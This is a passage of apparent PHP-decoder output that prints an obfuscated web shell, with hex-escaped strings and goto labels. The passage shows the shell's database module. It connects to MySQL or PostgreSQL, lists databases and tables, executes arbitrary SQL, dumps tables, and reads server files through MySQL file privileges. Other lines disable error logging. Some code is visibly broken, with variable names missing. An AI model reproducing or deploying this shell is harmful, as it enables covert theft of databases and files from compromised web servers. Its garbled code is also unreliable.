$_POST["\x63\x68\x61\x72\x73\145\164"] : '') . "\47\76\xa\74\164\x64\76\74\x6c\x61\142\x65\154\x3e\x3c\x73\x65\154\145\143\164\40\x6e\x61\155\x65\75\47\x74\x79\x70\x65\x27\x3e\74\157\160\x74\x69\157\156\40\x76\x61\154\x75\x65\75\47\x6d\x79\x73\x71\154\x27\40"; if (@$_POST["\x74\x79\x70\x65"] == "\x6d\x79\x73\161\x6c") { echo "\163\145\154\x65\x63\164\145\144"; } echo "\76\x4d\171\123\x71\154\x3c\57\157\x70\164\151\157\x6e\x3e\x3c\157\x70\164\151\157\156\40\x76\x61\154\x75\145\x3d\47\x70\147\x73\x71\x6c\47\40"; if (@$_POST["\x74\171\x70\x65"] == "\160\x67\x73\161\154") { echo "\163\145\x6c\145\x63\x74\145\144"; } echo "\x3e\120\x6f\x73\x74\x67\162\145\123\x71\154\x3c\57\157\160\x74\x69\x6f\x6e\x3e\74\x2f\163\145\154\x65\143\164\76\74\x2f\x6c\141\x62\x65\x6c\x3e\x3c\57\x74\144\x3e\xa\x3c\164\x64\76\74\x69\156\x70\165\x74\x20\164\x79\160\x65\x3d\164\x65\x78\x74\40\x6e\x61\x6d\x65\x3d\x73\x71\x6c\x5f\150\x6f\x73\x74\40\x76\141\154\x75\145\x3d\42" . (empty($_POST["\163\161\154\x5f\150\x6f\x73\x74"]) ? "\154\157\x63\x61\x6c\x68\x6f\163\x74" : htmlspecialchars($_POST["\x73\161\154\x5f\150\157\x73\164"])) . "\42\x3e\74\x2f\x74\x64\76\xa\x3c\x74\x64\x3e\x3c\x69\x6e\160\165\164\x20\x74\171\x70\145\x3d\x74\145\x78\164\40\x6e\141\x6d\x65\x3d\163\161\154\137\154\x6f\x67\x69\x6e\40\166\141\154\x75\x65\75\42" . (empty($_POST["\163\161\154\x5f\x6c\x6f\x67\151\156"]) ? "\162\157\x6f\164" : htmlspecialchars($_POST["\163\161\154\137\154\157\147\151\156"])) . "\42\x3e\74\x2f\164\x64\x3e\xa\x3c\164\x64\76\74\x69\x6e\160\165\164\x20\x74\171\x70\x65\75\x74\145\x78\x74\40\x6e\141\155\x65\75\x73\161\154\x5f\x70\x61\163\x73\40\166\x61\x6c\x75\x65\75\x22" . (empty($_POST["\x73\x71\x6c\137\x70\x61\x73\163"]) ? '' : htmlspecialchars($_POST["\x73\161\154\137\160\x61\x73\x73"])) . "\42\40\x72\145\x71\x75\151\x72\x65\x64\x3e\x3c\57\164\144\x3e\x3c\x74\144\x3e"; $tmp = "\74\151\156\x70\x75\x74\x20\164\x79\x70\145\x3d\164\145\170\x74\40\x6e\x61\x6d\x65\x3d\163\161\154\137\x62\x61\x73\145\x20\x76\141\x6c\165\145\x3d\47\x27\x3e"; if (isset($_POST["\x73\161\154\137\x68\157\163\x74"])) { if ($db->connect($_POST["\x73\161\x6c\137\150\x6f\x73\x74"], $_POST["\163\x71\154\x5f\154\157\147\151\x6e"], $_POST["\x73\161\154\x5f\160\x61\163\x73"], $_POST["\163\x71\154\137\x62\141\x73\x65"])) { switch ($_POST["\x63\x68\x61\162\x73\x65\x74"]) { case "\x57\x69\156\144\x6f\167\163\x2d\x31\x32\65\61": $db->setCharset("\143\x70\61\62\x35\x31"); break; case "\x55\x54\x46\55\x38": $db->setCharset("\x75\x74\146\70"); break; case "\113\x4f\x49\x38\x2d\122": $db->setCharset("\x6b\157\x69\70\162"); break; case "\113\117\111\x38\x2d\x55": $db->setCharset("\153\157\x69\70\165"); break; case "\143\160\x38\x36\x36": $db->setCharset("\x63\x70\x38\x36\66"); break; } $db->listDbs(); echo "\74\x6c\x61\142\145\x6c\76\74\x73\x65\x6c\145\143\x74\40\x6e\x61\155\145\75\163\x71\154\x5f\x62\141\163\x65\76\x3c\x6f\160\164\151\x6f\156\x20\x76\141\x6c\x75\x65\x3d\x27\x27\76\x3c\x2f\x6f\x70\164\x69\x6f\156\x3e"; while ($ = $db->fetch()) { list($key, $value) = each($); echo "\x3c\x6f\160\164\x69\157\x6e\x20\x76\x61\154\165\x65\75\x22" . $value . "\x22\x20" . ($value == $_POST["\163\161\x6c\x5f\x62\x61\x73\145"] ? "\163\145\154\x65\x63\x74\x65\x64" : '') . "\x3e" . $value . "\x3c\57\157\x70\x74\x69\157\x6e\76"; } echo "\74\x2f\x73\145\154\x65\143\x74\76\x3c\57\154\141\x62\145\x6c\x3e"; } else { echo $tmp; } } else { echo $tmp; } echo "\74\x2f\164\x64\76\12\11\11\x9\x9\x3c\164\144\76\x3c\x69\x6e\x70\x75\x74\40\x74\x79\160\145\75\163\x75\142\x6d\x69\164\40\x76\x61\x6c\x75\x65\x3d\x27\x73\x75\142\155\x69\x74\47\40\x6f\156\143\x6c\151\143\x6b\75\47\x66\x73\50\144\56\x73\146\51\x3b\x27\x3e\x3c\x2f\x74\144\x3e\12\40\40\x20\40\x20\40\x20\x20\x20\x20\40\40\40\40\40\40\74\x74\x64\x3e\x3c\x69\156\160\165\164\x20\x74\171\x70\x65\x3d\x63\x68\145\143\153\142\157\170\x20\x6e\x61\x6d\x65\x3d\163\161\154\x5f\143\x6f\165\156\164\40\166\x61\154\165\145\x3d\x27\157\156\47" . (empty($_POST["\x73\161\154\x5f\143\x6f\165\156\x74"]) ? '' : "\x20\143\x68\145\x63\x6b\145\x64") . "\76\40\x63\157\x75\x6e\164\40\164\150\145\40\156\165\155\x62\x65\162\40\x6f\x66\40\x72\x6f\x77\163\x3c\x2f\x74\144\76\xa\x9\11\x9\x3c\x2f\164\162\x3e\xa\11\11\74\x2f\x74\x61\x62\154\145\76\xa\11\x9\74\x73\143\x72\151\x70\164\76\xa\x20\x20\40\x20\x20\40\40\40\x20\40\x20\x20\x73\137\x64\x62\75\47" . @addslashes($_POST["\163\161\x6c\x5f\x62\x61\x73\145"]) . "\47\x3b\12\x20\40\40\40\40\40\40\40\40\40\x20\x20\146\165\156\x63\x74\x69\157\x6e\x20\146\x73\x28\146\x29\x20\x7b\12\40\x20\40\40\x20\40\x20\x20\40\40\x20\40\x20\40\x20\40\x69\x66\50\146\x2e\x73\x71\x6c\x5f\142\x61\x73\x65\x2e\166\141\x6c\x75\x65\41\x3d\x73\x5f\144\x62\x29\40\x7b\x20\x66\56\157\x6e\x73\x75\x62\x6d\151\164\40\75\x20\x66\x75\156\143\x74\x69\157\156\x28\x29\x20\x7b\175\73\xa\x20\x20\40\x20\x20\40\40\40\40\x20\40\40\40\x20\x20\40\x20\40\40\x20\x69\146\50\x66\x2e\x70\61\51\x20\x66\56\x70\x31\x2e\166\x61\x6c\x75\x65\75\x27\x27\73\12\40\40\40\x20\x20\40\x20\x20\40\40\x20\x20\x20\40\40\40\x20\40\x20\x20\x69\146\x28\x66\x2e\160\62\51\x20\x66\56\x70\62\56\x76\141\154\x75\x65\x3d\47\47\x3b\12\x20\40\40\x20\40\40\x20\40\x20\40\40\40\40\x20\x20\40\40\40\40\x20\151\146\x28\146\56\160\63\51\40\146\56\x70\63\x2e\166\x61\154\165\x65\x3d\47\x27\73\12\x20\x20\40\x20\40\x20\40\40\x20\40\x20\40\x20\40\x20\40\x7d\12\40\x20\40\40\40\x20\x20\40\40\40\x20\x20\x7d\12\x9\11\x9\x66\x75\156\x63\164\151\x6f\156\x20\x73\164\50\x74\54\x6c\51\40\173\12\x9\11\11\11\144\x2e\x73\146\x2e\160\61\56\x76\x61\x6c\x75\x65\x20\75\40\x27\163\145\154\x65\143\164\47\x3b\12\11\x9\11\x9\x64\56\163\146\56\160\x32\x2e\166\141\154\x75\x65\x20\x3d\40\x74\x3b\xa\40\x20\x20\x20\40\40\40\x20\x20\x20\40\40\x20\40\x20\x20\x69\146\50\154\x20\x26\46\x20\144\x2e\163\146\x2e\160\63\x29\40\x64\x2e\x73\x66\x2e\x70\63\x2e\x76\141\x6c\x75\x65\40\75\40\154\x3b\12\11\x9\11\11\144\x2e\x73\146\56\163\x75\x62\155\x69\x74\50\x29\x3b\xa\x9\x9\x9\175\12\x9\11\x9\146\x75\x6e\143\x74\151\x6f\x6e\x20\x69\163\50\x29\40\173\xa\x9\x9\11\x9\146\157\162\50\x69\75\60\73\x69\x3c\144\56\x73\x66\x2e\145\154\x65\x6d\x65\156\x74\x73\133\x27\x74\142\x6c\x5b\x5d\47\135\56\x6c\x65\156\x67\164\x68\x3b\x2b\x2b\x69\x29\xa\11\x9\11\x9\11\x64\x2e\x73\146\56\145\154\x65\155\x65\156\164\163\133\x27\164\x62\x6c\133\135\x27\x5d\133\151\135\56\143\150\x65\x63\153\145\144\40\75\40\x21\144\56\163\x66\x2e\145\154\145\x6d\x65\x6e\x74\163\133\x27\x74\x62\x6c\133\x5d\47\135\133\151\x5d\56\143\150\x65\143\x6b\145\144\x3b\xa\x9\x9\x9\x7d\xa\11\11\x3c\57\163\143\162\x69\160\x74\x3e"; if (isset($db) && $db->link) { echo "\x3c\x62\162\57\x3e\x3c\164\141\142\x6c\x65\x20\167\x69\144\x74\150\75\61\60\60\x25\x20\x63\145\x6c\154\160\141\144\144\x69\156\147\x3d\x32\40\143\145\x6c\x6c\x73\x70\x61\x63\x69\156\147\x3d\x30\x3e"; if (!empty($_POST["\x73\x71\154\137\142\x61\163\145"])) { $db->selectdb($_POST["\x73\161\154\137\142\x61\x73\x65"]); echo "\74\164\x72\x3e\x3c\x74\144\40\x77\151\x64\x74\x68\x3d\61\40\163\x74\x79\154\145\x3d\x27\142\x6f\x72\x64\x65\x72\55\x74\157\160\x3a\62\x70\170\x20\x73\x6f\154\x69\x64\40\43\66\66\x36\73\x27\76\x3c\163\x70\x61\156\x3e\124\141\142\x6c\145\x73\72\74\57\x73\160\141\156\x3e\74\x62\x72\76\x3c\x62\x72\76"; $tbls_res = $db->listTables(); while ($ = $db->fetch($tbls_res)) { list($key, $value) = each($); if (!empty($_POST["\163\x71\154\137\x63\157\165\156\164"])) { $n = $db->fetch($db->query("\x53\x45\x4c\105\x43\124\x20\x43\x4f\x55\116\x54\x28\52\51\40\141\163\40\156\40\106\122\117\x4d\40" . $value . '')); } $value = htmlspecialchars($value); echo "\74\156\157\142\162\76\74\151\156\x70\x75\164\x20\164\x79\160\x65\x3d\47\143\150\x65\143\x6b\142\x6f\x78\x27\x20\156\x61\155\x65\x3d\47\x74\142\x6c\133\x5d\x27\x20\x76\x61\154\165\145\75\47" . $value . "\x27\x3e\x26\x6e\x62\163\x70\73\74\141\x20\150\162\145\x66\x3d\x23\x20\x6f\156\143\154\151\143\153\x3d\x22\163\164\x28\x27" . $value . "\47\x2c\61\51\x22\76" . $value . "\x3c\x2f\x61\x3e" . (empty($_POST["\x73\161\154\x5f\143\x6f\165\156\x74"]) ? "\46\156\142\x73\160\73" : "\x20\x3c\x73\x6d\x61\154\x6c\76\50{$n["\156"]}\51\x3c\57\x73\x6d\x61\154\x6c\x3e") . "\x3c\57\x6e\157\x62\x72\x3e\74\x62\x72\x3e"; } echo "\x3c\151\x6e\x70\165\x74\x20\x74\x79\x70\145\75\x27\143\x68\145\143\x6b\142\x6f\170\x27\x20\x6f\156\x63\154\x69\x63\153\75\47\151\163\x28\x29\x3b\x27\76\40\x3c\151\156\x70\165\x74\40\164\x79\x70\145\x3d\x73\x75\x62\x6d\151\164\40\x76\x61\154\165\x65\x3d\47\104\x75\x6d\x70\x27\x20\x6f\x6e\143\154\151\143\x6b\x3d\x27\144\157\143\x75\x6d\x65\x6e\x74\56\x73\x66\x2e\x70\x32\x2e\x76\141\x6c\x75\145\x3d\x22\144\x6f\x77\x6e\x6c\157\141\x64\42\73\144\x6f\143\165\155\x65\156\x74\56\163\146\x2e\x73\x75\x62\x6d\151\164\50\51\x3b\x27\76\x3c\142\x72\76\106\x69\x6c\145\40\160\141\164\150\72\x3c\x69\x6e\x70\x75\x74\40\x74\171\160\x65\x3d\x74\x65\x78\x74\40\156\141\x6d\145\x3d\146\151\x6c\145\40\x76\141\154\165\145\75\47\x64\165\x6d\160\x2e\x73\161\154\47\76\74\57\164\x64\76\74\x74\x64\40\163\164\171\x6c\x65\x3d\47\x62\x6f\x72\144\145\x72\55\x74\x6f\160\x3a\62\x70\x78\40\163\x6f\154\151\144\40\43\x36\x36\66\73\x27\76"; if (@$_POST["\x70\61"] == "\163\145\x6c\145\x63\x74") { $_POST["\x70\61"] = "\x71\x75\x65\x72\x79"; $_POST["\160\x33"] = $_POST["\160\63"] ? $_POST["\x70\x33"] : 1; $db->query("\123\105\x4c\105\103\124\40\x43\117\x55\x4e\x54\x28\52\51\40\x61\x73\40\x6e\x20\x46\122\117\115\x20" . $_POST["\160\x32"]); $num = $db->fetch(); $pages = ceil($num["\x6e"] / 30); echo "\x3c\163\143\162\x69\160\164\76\x64\56\163\146\56\157\156\x73\x75\x62\155\151\x74\x3d\146\165\x6e\x63\x74\151\157\x6e\50\51\173\x73\164\x28\x22" . $_POST["\x70\62"] . "\x22\54\x20\x64\x2e\x73\146\56\x70\x33\x2e\x76\x61\154\x75\145\x29\175\x3c\x2f\x73\x63\162\x69\x70\164\76\x3c\x73\x70\141\x6e\x3e" . $_POST["\160\x32"] . "\x3c\x2f\163\x70\x61\x6e\76\40\50{$num["\156"]}\x20\162\x65\143\157\x72\144\163\x29\40\x50\x61\147\145\40\x23\x20\x3c\151\x6e\x70\165\x74\40\x74\171\160\145\x3d\x74\x65\170\164\x20\156\x61\155\145\75\47\160\63\x27\x20\166\x61\x6c\165\145\75" . (int) $_POST["\x70\63"] . "\x3e"; echo "\x20\157\x66\40{$pages}"; if ($_POST["\160\63"] > 1) { echo "\40\74\141\40\150\x72\145\146\75\x23\x20\157\x6e\143\x6c\x69\143\153\x3d\47\x73\x74\x28\42" . $_POST["\x70\62"] . "\x22\x2c\40" . ($_POST["\160\x33"] - 1) . "\51\47\76\x26\154\164\73\40\x50\162\145\166\x3c\57\141\x3e"; } if ($_POST["\160\63"] < $pages) { echo "\40\74\x61\x20\x68\162\x65\146\x3d\43\x20\157\156\143\154\151\x63\153\75\x27\x73\164\50\x22" . $_POST["\x70\x32"] . "\42\x2c\40" . ($_POST["\x70\63"] + 1) . "\x29\47\76\x4e\x65\x78\164\x20\46\147\164\x3b\x3c\57\x61\x3e"; } $_POST["\160\63"]--; if ($_POST["\x74\x79\160\x65"] == "\160\x67\x73\161\154") { $_POST["\x70\62"] = "\123\x45\x4c\105\x43\124\x20\x2a\40\106\x52\x4f\x4d\x20" . $_POST["\160\62"] . "\x20\x4c\111\x4d\x49\x54\x20\x33\x30\40\117\x46\106\123\105\124\x20" . $_POST["\x70\63"] * 30; } else { $_POST["\x70\x32"] = "\123\105\114\x45\103\124\x20\52\40\x46\122\117\x4d\x20\x60" . $_POST["\x70\x32"] . "\140\x20\114\111\x4d\111\x54\40" . $_POST["\160\x33"] * 30 . "\x2c\x33\x30"; } echo "\x3c\x62\162\76\74\x62\162\76"; } if (@$_POST["\160\x31"] == "\x71\165\x65\x72\171" && !empty($_POST["\160\x32"])) { $db->query(@$_POST["\160\62"]); if ($db->res !== false) { $title = false; echo "\74\164\141\142\x6c\145\40\x77\151\144\x74\x68\x3d\61\x30\60\45\40\x63\145\x6c\x6c\163\x70\141\x63\151\156\x67\x3d\x31\x20\x63\145\x6c\154\x70\x61\144\144\x69\156\147\75\62\40\143\x6c\141\163\x73\75\x6d\141\x69\x6e\x3e"; $line = 1; while ($ = $db->fetch()) { if (!$title) { echo "\74\x74\162\x3e"; foreach ($ as $key => $value) { echo "\x3c\x74\x68\x3e" . $key . "\x3c\x2f\x74\x68\76"; } reset($); $title = true; echo "\74\57\164\x72\x3e\x3c\164\x72\x3e"; $line = 2; } echo "\74\x74\x72\x20\x63\x6c\x61\163\x73\x3d\x22\x6c" . $line . "\42\x3e"; $line = $line == 1 ? 2 : 1; foreach ($ as $key => $value) { if ($value == null) { echo "\x3c\164\144\x3e\74\151\x3e\156\x75\x6c\x6c\74\x2f\151\x3e\74\57\x74\144\76"; } else { echo "\74\164\144\x3e" . nl2br(htmlspecialchars($value)) . "\x3c\x2f\x74\144\76"; } } echo "\x3c\x2f\164\x72\x3e"; } echo "\x3c\57\x74\141\x62\x6c\x65\x3e"; } else { echo "\x3c\144\151\166\76\x3c\142\76\x45\162\162\157\162\72\x3c\57\142\x3e\x20" . htmlspecialchars($db->error()) . "\74\x2f\144\151\166\76"; } } echo "\x3c\x62\x72\76\74\57\146\x6f\162\x6d\x3e\74\146\x6f\162\x6d\x20\157\156\x73\165\142\x6d\151\x74\x3d\47\x64\56\x73\146\x2e\x70\61\x2e\166\141\x6c\165\145\x3d\x22\161\x75\x65\x72\x79\42\73\144\x2e\x73\x66\x2e\160\x32\x2e\166\141\154\165\x65\x3d\164\150\151\x73\x2e\161\165\x65\162\171\x2e\x76\141\154\165\x65\73\144\157\143\x75\155\145\x6e\164\x2e\163\x66\x2e\163\x75\x62\155\151\x74\x28\51\x3b\x72\x65\x74\165\x72\156\x20\146\x61\154\x73\145\73\x27\x3e\x3c\x74\x65\170\164\x61\x72\145\141\40\x6e\141\x6d\145\75\x27\161\165\145\x72\x79\x27\x20\x73\x74\171\x6c\x65\75\47\x77\151\x64\x74\150\x3a\61\60\60\45\73\150\x65\151\x67\150\164\x3a\x31\60\x30\160\170\x27\76"; if (!empty($_POST["\160\62"]) && $_POST["\x70\x31"] != "\154\157\x61\144\x66\151\x6c\x65") { echo htmlspecialchars($_POST["\x70\62"]); } echo "\x3c\57\164\x65\x78\x74\141\162\145\x61\76\x3c\142\162\57\x3e\74\151\156\x70\x75\x74\40\164\171\x70\x65\75\163\x75\x62\155\x69\164\40\166\x61\x6c\x75\x65\x3d\x27\105\x78\x65\x63\x75\164\x65\x27\x3e"; echo "\74\57\x74\144\x3e\x3c\x2f\x74\162\76"; } echo "\74\57\164\141\142\154\145\x3e\x3c\57\x66\x6f\162\155\x3e\x3c\x62\162\57\x3e"; if ($_POST["\x74\171\x70\x65"] == "\x6d\x79\163\x71\x6c") { $db->query("\123\x45\114\105\103\x54\40\61\40\106\x52\117\115\x20\x6d\x79\x73\161\154\x2e\165\163\x65\162\x20\127\110\x45\x52\x45\40\143\x6f\156\x63\x61\x74\50\x60\x75\163\145\162\x60\54\x20\47\x40\x27\54\40\x60\150\x6f\x73\164\x60\x29\x20\x3d\x20\x55\x53\x45\122\50\51\x20\101\x4e\104\40\x60\x46\151\154\145\x5f\x70\x72\151\x76\x60\40\x3d\40\x27\x79\47"); if ($db->fetch()) { echo "\x3c\146\157\162\155\40\157\x6e\x73\165\x62\155\x69\164\x3d\47\x64\56\x73\x66\56\x70\61\x2e\166\141\x6c\x75\145\75\x22\x6c\157\141\x64\146\151\x6c\145\x22\73\x64\157\143\x75\x6d\x65\x6e\164\56\x73\x66\x2e\160\x32\56\166\x61\154\165\x65\75\164\150\151\163\56\x66\x2e\166\x61\154\165\145\x3b\144\157\x63\x75\155\145\156\164\56\x73\146\56\163\x75\142\155\151\164\x28\51\73\x72\145\164\x75\162\156\40\146\x61\154\163\x65\x3b\x27\76\x3c\163\x70\x61\x6e\x3e\114\x6f\141\144\40\x66\x69\x6c\x65\74\x2f\x73\160\x61\x6e\76\x20\74\x69\x6e\x70\165\164\x20\x20\143\x6c\x61\x73\163\x3d\47\164\x6f\157\x6c\163\x49\x6e\160\47\40\x74\171\x70\145\75\164\x65\170\x74\40\x6e\x61\155\145\75\146\x3e\74\x69\156\160\x75\x74\40\164\x79\160\145\x3d\163\165\x62\x6d\151\164\40\166\141\x6c\165\x65\x3d\47\x73\165\142\x6d\x69\x74\47\76\x3c\57\x66\157\x72\155\x3e"; } } if (@$_POST["\x70\x31"] == "\x6c\157\x61\144\x66\151\154\145") { $file = $db->loadFile($_POST["\160\62"]); echo "\x3c\142\x72\x2f\76\74\160\x72\145\40\143\x6c\x61\x73\x73\75\x6d\154\61\x3e" . htmlspecialchars($file["\x66\x69\x6c\x65"]) . "\74\x2f\160\162\x65\76"; } } else { echo htmlspecialchars($db->error()); } echo "\x3c\x2f\x64\151\x76\x3e"; hardFooter(); } goto et3or; hwJg4: @ini_set("\x6c\157\147\137\x65\x72\162\157\162\163", 0); goto gkT1m; WJp40: $home_cwd = @getcwd(); goto YIyjV; G6Uv3:

Function Calls

None

Variables

None

Stats

MD5 14f8803e05993c62fccc7dabd7c1f822
Eval Count 0
Decode Time 239 ms